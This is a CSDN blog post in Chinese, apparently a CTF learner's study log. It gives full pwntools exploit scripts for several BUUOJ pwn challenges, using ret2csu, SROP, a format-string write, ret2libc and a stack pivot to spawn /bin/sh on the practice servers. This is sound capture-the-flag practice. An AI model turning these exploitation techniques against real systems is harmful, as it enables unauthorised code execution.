21 07 15学习总结

最新推荐文章于 2023-04-24 19:26:41 发布
最新推荐文章于 2023-04-24 19:26:41 发布
阅读量182 收藏
点赞数
分类专栏: Pwn 学习经历 做题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/eeeeeight/article/details/118776205
版权
学习经历 同时被 3 个专栏收录
83 篇文章 3 订阅
订阅专栏
Pwn
32 篇文章 0 订阅
订阅专栏
做题记录
19 篇文章 0 订阅
订阅专栏

21.07.15学习总结

Column: July 15, 2021
Tags: learning experience

05:00-05:15: 补档昨天的学习总结和继续整理ctf套路集合

05:20-05:50: 写了两种ciscn_2019_s_3的解法, 一种昨天想的csu, 一种基础srop(顺便稍微复习了一下, 注意这个由于出现了不可避免的push rbp, 所以要先处理一下rbp)

05:55-06:10: 更新ctf套路集合, 加入了部分常用代码

06:45-08:15: buuoj刷题:

fm: %x$…这玩意忘了, 做了一会才做出了…

17:00-17:40: buuoj

21:30-22:30: buuoj, ez_pz_hackover_2016这题我做的太麻烦了, 虽然也收获了点东西(fgets的第三个参数应该是加上libc的真实地址, 而且stdin这种东西, libc里直接找是找不到的)

22:40-24:00: 英语口语学习, 就学了六个元音, 练到舌头打结了…

ciscn_2019_s_3(方法一: csu):

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./ciscn_s_3')
sh=remote('node4.buuoj.cn',28891)
elf=ELF('./ciscn_s_3')
libc=elf.libc
context.log_level='debug'

read=0x4004F1
pop_rdi=0x4005a3
mov_rax_exe=0x4004e2
csu_1=0x400580
csu_2=0x400596
syscall_addr=0x400517

#gdb.attach(sh, '''b *0x400517''')
sh.send('w'*16+p64(read))
sh.recv(0x20)
leak_stack=u64(sh.recv(8))
log.success('leak stack: '+hex(leak_stack))
'''
csu1:
    0x400580 <__libc_csu_init+64>:	mov    rdx,r13
    0x400583 <__libc_csu_init+67>:	mov    rsi,r14
    0x400586 <__libc_csu_init+70>:	mov    edi,r15d
=>  0x400589 <__libc_csu_init+73>:	call   QWORD PTR [r12+rbx*8]
    0x40058d <__libc_csu_init+77>:	add    rbx,0x1
    0x400591 <__libc_csu_init+81>:	cmp    rbx,rbp
    0x400594 <__libc_csu_init+84>:	jne    0x400580 <__libc_csu_init+64>

csu2:
    0x400596 <__libc_csu_init+86>:	add    rsp,0x8
    0x40059a <__libc_csu_init+90>:	pop    rbx
    0x40059b <__libc_csu_init+91>:	pop    rbp
    0x40059c <__libc_csu_init+92>:	pop    r12
    0x40059e <__libc_csu_init+94>:	pop    r13
    0x4005a0 <__libc_csu_init+96>:	pop    r14
    0x4005a2 <__libc_csu_init+98>:	pop    r15
    0x4005a4 <__libc_csu_init+100>:	ret
'''
sh.send('/bin/sh\x00'*2+p64(csu_2)+p64(0)+p64(0)+p64(0x40051b)+p64(leak_stack-0xe8)+p64(0)+p64(0)+p64(0)+p64(csu_1)+p64(pop_rdi)+p64(leak_stack-0x108)+p64(mov_rax_exe)+p64(syscall_addr))
'''                                rsp+8   rbx    rbp:pop_rdi   r12                 r13    r14    r15'''
sh.interactive()

ciscn_2019_s_3(方法二: srop):

#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=process('./ciscn_s_3')
#sh=remote('node4.buuoj.cn',28891)
elf=ELF('./ciscn_s_3')
libc=elf.libc
context.log_level='debug'
context.binary='./ciscn_s_3'

mov_rax_15=0x4004D6
syscall_addr=0x400517
read_addr=0x4004F1
pop_rbp=0x4004EB 

#gdb.attach(sh, '''b *0x400517''')
sh.send('w'*16+p64(read_addr))
leak_stack=u64(sh.recv(0x28)[-8:])
log.success('leak stack: '+hex(leak_stack))

bin_sh_addr=leak_stack-0x110
frame=SigreturnFrame()
frame.rip=syscall_addr
frame.rax=constants.SYS_execve
frame.rdi=bin_sh_addr
frame.rsi=0
frame.rdx=0
frame.rsp=leak_stack
payload='/bin/sh\x00'*2+p64(pop_rbp)+p64(syscall_addr)+p64(mov_rax_15)+str(frame)
sh.send(payload)
sh.interactive()

jarvisoj_fm(基础格式化字符串, %$这玩意不计入n中):

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./fm')
sh=remote('node4.buuoj.cn',28882)
elf=ELF('./fm')
#context.log_level='debug'
payload=p32(0x804a02c)+'%11$n'
sh.send(payload)
sh.interactive()

[HarekazeCTF2019]baby_rop2:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./babyrop2')
sh=remote('node4.buuoj.cn',25518)
elf=ELF('./babyrop2')
context.log_level='debug'
#libc=elf.libc
libc=ELF('./libc/libc.so.6')

pop_rdi=0x400733
pop_rsi_r15=0x400731
fmt_addr=0x400770
main_addr=0x400636

#gdb.attach(sh, '''b *0x4006ca''')
payload1='w'*0x28+p64(pop_rdi)+p64(fmt_addr)+p64(pop_rsi_r15)+p64(elf.got['read'])\
        +p64(0)+p64(elf.sym['printf'])+p64(main_addr)
sh.send(payload1)
sh.recvuntil('again, ')
sh.recvuntil('again, ')
read_addr=u64(sh.recv(6).ljust(8, '\x00'))
libc_base=read_addr-libc.sym['read']
log.success('read addr: '+hex(read_addr))
log.success('libc base: '+hex(libc_base))

payload2='b'*0x28+p64(pop_rdi)+p64(libc_base+libc.search('/bin/sh\x00').next())\
        +p64(libc_base+libc.sym['system'])
sh.recvuntil("What's your name? ")
sh.send(payload2)
sh.interactive()

ciscn_2019_es_2(栈迁移):

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./ciscn_2019_es_2')
sh=remote('node4.buuoj.cn',28650)
elf=ELF('./ciscn_2019_es_2')
libc=ELF('./libc-2.27.so')
#libc=elf.libc
context.log_level='debug'

leave_ret=0x8048562

#gdb.attach(sh, '''b *0x80485cd''')
sh.send('w'*40)
sh.recvuntil('w'*40)
leak_stack=u32(sh.recv(4))
sh.recv()
log.success('leak stack: '+hex(leak_stack))
read_stack_addr=leak_stack-0x38

payload=p32(elf.sym['system'])+p32(elf.sym['main'])+p32(read_stack_addr+0xc)\
        +'/bin/sh\x00'
payload+='a'*(40-len(payload))+p32(read_stack_addr-4)+p32(leave_ret)
sh.send(payload)
#sh.send('w'*40+p32(leave_ret))
sh.interactive()

ez_pz_hackover_2016(其实两次就够了):

#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./ez_pz_hackover_2016')
sh=remote('node4.buuoj.cn',29181)
elf=ELF('./ez_pz_hackover_2016')
#context.log_level='debug'
libc=ELF('./libc-2.23.so')

payload1="crashme"+p32(0)+'wwww'*3+'bbb'+p32(elf.sym['printf'])+p32(elf.sym['chall'])\
        +p32(0x8048845)+p32(elf.got['stdin'])
sh.recv()
sh.sendline(payload1)
sh.recvuntil('Welcome ')
sh.recvuntil('Welcome ')
stdin_addr=u32(sh.recv(4))
libc_base=stdin_addr-libc.sym['stdin']
log.success('stdin addr: '+hex(stdin_addr))

payload2="crashme"+p32(0)+'wwww'*3+'bbb'+p32(elf.sym['fgets'])+p32(elf.sym['chall'])\
        +p32(0x804a400)+p32(0x10)+p32(stdin_addr)
sh.recv()
sh.sendline(payload2)
sh.sendline('/bin/sh\x00')

payload3="crashme"+p32(0)+'wwww'*3+'bbb'+p32(elf.sym['printf'])+p32(elf.sym['chall'])\
        +p32(0x8048845)+p32(elf.got['printf'])
sh.recv()
sh.sendline(payload3)
sh.recvuntil('Welcome ')
sh.recvuntil('Welcome ')
printf_addr=u32(sh.recv(4))
libc_base=printf_addr-libc.sym['printf']
log.success('libc base: '+hex(printf_addr))

payload4="crashme"+p32(0)+'wwww'*3+'bbb'+p32(libc_base+libc.sym['system'])+'bye~'\
        +p32(0x804a400)
sh.recv()
sh.sendline(payload4)
sh.interactive()
北岛静石
关注
专栏目录
[Python从零到壹] 十三.机器学习之聚类算法四万字总结全网首发(K-Means、BIRCH、树状聚类、MeanShift)
杨秀璋的专栏
07-06 1万+
欢迎大家来到“Python从零到壹”,在这里我将分享约200篇Python系列文章,带大家一起去学习和玩耍,看看Python这个有趣的世界。所有文章都将结合案例、代码和作者的经验讲解,真心想把自己近十年的编程经验分享给大家,希望对您有所帮助,文章中不足之处也请海涵。Python系列整体框架包括基础语法10篇、网络爬虫30篇、可视化分析10篇、机器学习20篇、大数据分析20篇、图像识别30篇、人工智能40篇、Python安全20篇、其他技巧10篇。您的关注、点赞和转发就是对秀璋最大的支持,知识无价人有情,希望
07-机器学习
最新发布
南柯一梦的江湖
06-10 182
1.机器学习概述 人工智能学科体系 人工智能、机器学习、深度学习的关系 可以认为深度学习是机器学习的高级阶段。 什么是机器学习 机器学习是一门能够让编程计算机从数据中学习的计算机科学。 一个计算机程序在完成任务T之后,获得经验E,其表现效果为P,如果任务T的性能表现,也就是用以衡量的P,随着E增加而增加,那么这样计算机程序就被称为机器学习系统。 自我完善,自我增进,自我适应。 通俗地讲,机器学习就是建立模型, 根据已知数据的输入与输出去进行自动学习,发现输入与输出之间的规律,并总结该规律,进而使用该模型
BUU刷题记录(三)
山高路远
04-10 3096
buu——pwn学习 十、铁人三项(第五赛区)_2018_rop checksec一下,开启了nx保护,然后拖入ida 呃。。。应该就是比较熟悉的rop的构建了,直接上exp吧,这类题目做挺多的了: 十一、gyctf_2020_borrowstack 先做下这题,一直想完整的了解栈迁移,借着这题真正的掌握栈迁移的手法和知识点吧,先checksec一下,再拖入ida分析 里面很简单,没有什么复杂的函数,很适合借此了解栈迁移!首先read函数读取的字节数不够,只能够刚好覆盖返回地址。第二输入点的位置是b
BUUCTF pwn——ciscn_2019_s_3
CNS-Enterprise BCC-1701-J
04-24 132
BUUCTF 做题练习
ciscn_2019_s_3
qq_45691294的博客
12-29 2194
首先拿到程序先查看一下程序类型 是一个x86-64的ELF文件,查看一下保护,只开启了堆栈不可执行保护 用IDA分析一下该程序 main函数直接进入到vuln函数,这里利用了系统调用,64位的系统调用的传参方式为 首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 vuln函数执行了read(0,buf,0x400),又执行了write(1,buf,0x30)。看一下buf的位置,发现距离rbp只有0x10大小,存在栈溢出 这里的栈
[HarekazeCTF2019]baby_rop2【BUUCTF】
qq_41696518的博客
09-02 390
明显存在栈溢出,那么就是找system和/bin/sh的问题了,该题给了libc,那就是泄露出真实的libc载入基址本题即可求解。由于本题是64位的,因此参数要写入寄存器中,顺序为rdi,rsi,rdx,rcx,r8,r9。
07 React实现Todolist练习 (上)(1521秒).rar
08-17
本教程“07 React实现Todolist练习(上)(1521秒)”主要针对React的基础知识进行讲解,并通过一个实际的TodoList应用的开发过程,帮助初学者掌握React的基本用法和概念。 首先,React的核心概念是组件。组件是...
Draft Tue Sep 25 21:53:07 CST 2018-数据集
03-30
标题和描述提及的“Draft Tue Sep 25 21:53:07 CST 2018-数据集”可能是一个在2018年9月25日周二晚9点53分创建或更新的数据集草稿,它可能是为某个特定项目或研究准备的。而“ccf_offline_stage1_test_revised.csv”...
机器学习/深度学习常用库的配置及其适用的算法总结
i-kernel
12-31 1919
机器学习/深度学习常用库的配置及其适用的算法总结 常识 传统机器学习框架和深度学习框架之间有区别。本质上,机器学习框架涵盖用于分类,回归,聚类,异常检测和数据准备的各种学习方法,并且其可以或可以不包括神经网络方法。深度学习或深度神经网络(DNN)框架涵盖具有许多隐藏层的各种神经网络拓扑。这些层包括模式识别的多步骤过程。网络中的层越多,可以提取用于聚类和分类的特征越复杂。 按照各类框架主要实现...
BUUCTF|PWN-[HarekazeCTF2019]baby_rop2-WP
l2645470582_的博客
01-18 663
1.检查保护机制 开启了堆栈不可执行 2.用64位IDA打开该文件 (1)shift+f12,查看关键字符串 (2)双击,ctrl+x,进入反汇编代码 (3)ROPgadget查看返回地址 (4)payload payload = b'a'*(0x20+0x8) + p64(pop_rdi) + p64(format_) + p64(pop_r15) + p64(got_addr) + p64(0) + p64(plt_addr) + p64(main_addr) 1.
[HarekazeCTF2019]baby_rop2
z1r0的博客
12-07 906
[HarekazeCTF2019]baby_rop2 查看保护 有溢出,ret2libc即可。这里使用printf这个函数来泄露libc。 printf有两个参数。第一个用rdi来压参数。第二个用rsi来。泄露出libc之后,还是正常的rop。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('
BUUCTF pwn [HarekazeCTF2019]baby_rop2
菜的只能随便写写博客
02-17 1707
0x01 文件分析   0x02 运行  和babyrop一样。   0x03 IDA  程序流程和babyrop差不多,但是这个里面没有提供可用的gadget,需要自己完成rop。   0x04 思路  没有默认的gadget,需要自己构建,需要利用栈溢出和printf函数泄露libc版本和libc基址,再构建rop。需要注意的是printf函数需要用到的参数,第一个参数需要为格式化字符...
BUUCTF [HarekazeCTF2019]baby_rop2
红叶的博客
10-28 416
IDA Pro 静态调试。依旧可以使用上次的PoC。
[BUUCTF]PWN——[HarekazeCTF2019]baby_rop2
mcmuyanga的博客
10-04 4475
[HarekazeCTF2019]baby_rop2 题目附件 步骤: 例行检查,64位,开启了nx保护 运行了一下程序,了解大概的执行情况 64位ida载入,shift+f12检索程序里的字符串,没有发现可以直接利用的,从main函数开始看程序 利用思路: 程序很简单,buf的大小是0x20,但是读入的时候读入的是0x100,会造成溢出,我们要想办法覆盖返回地址为” system(‘/bin/sh’)“,那样在执行13行语句的时候,程序回去调用我们布置好的栈,从而得到shell 但是程序里没有现成
[PWN] BUUCTF [HarekazeCTF2019]baby_rop2
空城惜梦的博客
06-09 511
[PWN] BUUCTF [HarekazeCTF2019]baby_rop2解题分析漏洞利用payload解析payload 解题分析 按照惯例先checksec,发现开了nx和RELRO,又因为题目给了文件libc.so.6,所以猜测要需要构造ROP来布置程序执行路线图 运行程序来观察程序的逻辑,发现需要输入name,然后程序再把输入的name打印出来 64位IDA打开,发现buf缓冲区只有0x20个字节大小,但read却可以往buf缓冲区中写入0x100个字节,所以这里存在着栈溢出 shift+
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值